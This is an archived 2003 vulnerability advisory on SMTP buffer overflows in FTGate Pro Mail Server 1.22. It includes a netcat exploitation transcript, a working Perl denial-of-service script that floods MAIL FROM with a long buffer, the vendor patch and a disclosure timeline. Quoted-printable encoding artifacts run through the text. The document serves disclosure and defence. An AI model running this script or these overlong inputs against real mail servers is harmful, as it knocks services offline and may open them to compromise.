Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Windows Net Apps :: bt124.txt

FTGate Pro Mail Server v. 1.22 Multiple Buffer Overflow Vulnerabilities (2003)





                    Multiple Buffer Overflow Vulnerabilities
                 Found in FTGate Pro Mail Server v. 1.22 (1328)
                           http://www.ftgate.com
                        =20
                          Discovered by Dennis Rand
                             www.Infowarfare.dk
------------------------------------------------------------------------


-----[SUMMARY
FTGatePro is Floosietek's flagship server. The comprehensive feature set =

In this server ensures that it will meet whatever demands you place on =
it.=20
This server is powerful enough for the most demanding of tasks.

The problem is a Buffer Overflow in the SMTP protocol, within the=20
ESMTP Server FTGate, causing the service to stop responding for a short
Period, where we can actually overwrite the exception handler on the =
stack
allowing=20
A system compromise with code execution running as SYSTEM.


-----[AFFECTED SYSTEMS
Vulnerable systems:
 * FTGate Pro Mail Server v. 1.22 (1328)

Immune systems:
 * FTGate Pro Mail Server v. 1.22 (HotFix 1330)

-----[SEVERITY
Medium/High - An attacker is able to cause a DoS attack on the SMTP
protocol.
              And we can actually overwrite the exception handler on the
stack=20
              Allowing a system compromise with code execution running =
as
SYSTEM.
             =20

-----[DESCRIPTION OF WHAT THE VULNERABILITY IS
The Vulnerability is a Buffer Overflow in the FTGate Pro Mail Server v. =
1.22
(1328) When a malicious attacker sends a large amount into the "MAIL =
FROM"
and the "RCPT TO" The buffer will overflow. If the code was carefully
crafted, attackers could execute=20
Arbitrary command in system privilege.

The following transcript demonstrates a sample exploitation of the=20
Vulnerabilities:
----------------------------- [Transcript] ----------------------------- =
nc
warlab.dk 25 220 win2k-serv ESMTP Server FTGate HELO Foobar 250 =
win2k-serv
Mail From : <aaaaa....[BUFFER about 2000 Bytes @ and 2000 bytes again =
ending
with ".com"] <Connection closed>

The same Vulnerability is in the RCPT TO
nc warlab.dk 25
220 win2k-serv ESMTP Server FTGate
HELO Foobar
250 win2k-serv
Mail From : admin@warlab.dk
250 <admin@warlab.dk> Sender Ok
Rcpt To: <aaaaa....[BUFFER about 2000 Bytes @ and 2000 bytes again =
ending
with ".com"] <connection closed>
----------------------------- [Transcript] -----------------------------

----------------------------- [Exploit Code] =
-----------------------------
#!/usr/bin/perl -w ################## # FTGate Pro Mail Server v. 1.22
(1328) DoS attack # # URL: http://www.infowarfare.dk/ # EMAIL:
der@infowarfare.dk # USAGE: sploit.pl <target ip> # # Summary: # # The
problem is a Buffer Overflow in the SMTP protocol, within the=20
# ESMTP Server FTGate, causing the service to stop responding for a =
short #
Period, where we can actually overwrite the exception handler on the =
stack
allowing=20
# A system compromise with code execution running as SYSTEM.
#=20
#
# Solution:=20
# Upgrade to FTGate Pro Mail Server v. 1.22 (HotFix 1330) or later #=20
#

use IO::Socket;
   =20
$target =3D shift() || "warlab.dk";
my $port =3D 25;
my $Buffer =3D "a" x 2400;


my $sock =3D IO::Socket::INET->new (
                                    PeerAddr =3D> $target,
                                    PeerPort =3D> $port,
                                    Proto =3D> 'tcp'
                                 ) || die "could not connect: $!";

my $banner =3D <$sock>;
if ($banner !~ /^2.*/)
{
    print STDERR "Error: invalid server response '$banner'.\n";
    exit(1);
}

print $sock "HELO $target\r\n";
$resp =3D <$sock>;

print $sock "MAIL FROM: $Buffer\@$Buffer.dk\r\n";
$resp =3D <$sock>;

print $sock "\r\n";
print $sock "\r\n\r\n\r\n\r\n\r\n\r\n";

close($sock);
----------------------------- [Exploit Code] =
-----------------------------

When this attack is preformed the service will shortly stop and then =
restart
after about 5-10 seconds, all current connections when this attack is
preformed will be closed.


-----[DETECTION
FTGate Pro Mail Server v. 1.22 (1328) is vulnerable to the =
above-described
attacks.=20
Earlier versions may be susceptible as well. To determine if a specific=20
implementation is vulnerable, experiment by following the above =
transcript.=20


-----[WORK AROUNDS
Upgrade to FTGate Pro Mail Server v. 1.22 (HotFix 1330)=20


-----[VENDOR RESPONSE
Hi,
Thank you for brining this to my attention.
We have fixed the problem with the code and will release a patch =
shortly.
Regards Richard Bang Floosietek Ltd richard@ftgate.com
http://www.floosietek.com

Hi,

The patch should be up later today.=20
New users will automatically download the patched version.=20
Existing users download it through the WebAdmin UI.
Regards
Richard Bang
Floosietek Ltd
richard@ftgate.com
http://www.floosietek.com


-----[DISCLOSURE TIMELINE
20/04/2003 Found the Vulnerability, and made an analysis. 23/04/2003
Contacted Vendor at support@ftgate.com=20
29/04/2003 Received response from Vendor
05/05/2003 Contacted vendor for update
06/05/2003 Received response from vendor=20
06/05/2003 Public Disclosure.


-----[ADDITIONAL INFORMATION
The vulnerability was discovered and reported by <der@infowarfare.dk> =
Dennis
Rand

-----[DISCLAIMER
The information in this bulletin is provided "AS IS" without warranty of =
any
kind.=20
In no event shall we be liable for any damages whatsoever including =
direct,
indirect,=20
incidental, consequential, loss of business profits or special damages.=20





TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH